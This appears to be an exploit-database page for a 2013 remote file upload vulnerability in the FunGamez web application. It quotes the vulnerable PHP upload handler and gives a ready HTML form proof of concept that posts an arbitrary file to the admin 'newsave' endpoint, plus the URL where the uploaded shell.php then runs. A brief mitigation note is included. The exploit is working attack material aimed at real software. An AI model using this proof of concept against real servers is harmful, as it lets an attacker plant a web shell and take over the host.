header-logo
Suggest Exploit
vendor:
FunGamez
by:
cr4wl3r
7,5
CVSS
HIGH
Remote File Upload
434
CWE
Product Name: FunGamez
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

FunGamez Remote File Upload Vulnerability

FunGamez is vulnerable to a remote file upload vulnerability. An attacker can exploit this vulnerability by sending a malicious file to the server via a specially crafted POST request. The malicious file will be uploaded to the server and can be accessed via the URL http://localhost/[FunGamez]/data/flash/shell.php.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate MIME type and that the application validates the content of the uploaded file.
Source

Exploit-DB raw data:

# FunGamez Remote File Upload Vulnerability
# Brought to you by cr4wl3r http://bastardlabs.info
# Software Link: http://sourceforge.net/projects/fg-gsm/?source=dlp
-----------------------------------------------
Source [FunGamez]/admin/modules/game.php

..........
135    </table></form><?php
136 }
137 Else If ( $mode == 'newsave' )
138 {
139   If ( $_FILES['src_upload']['name'] != '' && $_POST['src_link'] != '' ) { header('Location: ./index.php?admin&module=game&mode=new&msg=doublesrc'); die(); }
140   If ( ( $_FILES['src_upload']['name'] == '' && $_POST['src_link'] == '' ) || $_POST['name'] == '' ) { header('Location: ./index.php?admin&module=game&mode=new&msg=reqg'); die(); }
141   If ( $_FILES['src_upload']['name'] != '' )
142   {
143      $src = $_FILES['src_upload']['name'];
144	  move_uploaded_file($_FILES['src_upload']['tmp_name'], './data/flash/'.$_FILES['src_upload']['name']);
145   }
..........


Proof of concept:

<form action="http://localhost/[FunGamez]/index.php?admin&module=game&mode=newsave" method="POST" enctype="multipart/form-data">
<input type="text" name="name" value="blablablablabla" /><br>
<input type="file" name="src_upload" /><br>
<input type="submit" value="w00tw00t" />

And your shell will be available here:

http://localhost/[FunGamez]/data/flash/shell.php

-----------------------------------------------

// Gorontalo 31 Juli 2013

Navigation

Suggest Exploit

Services By CQR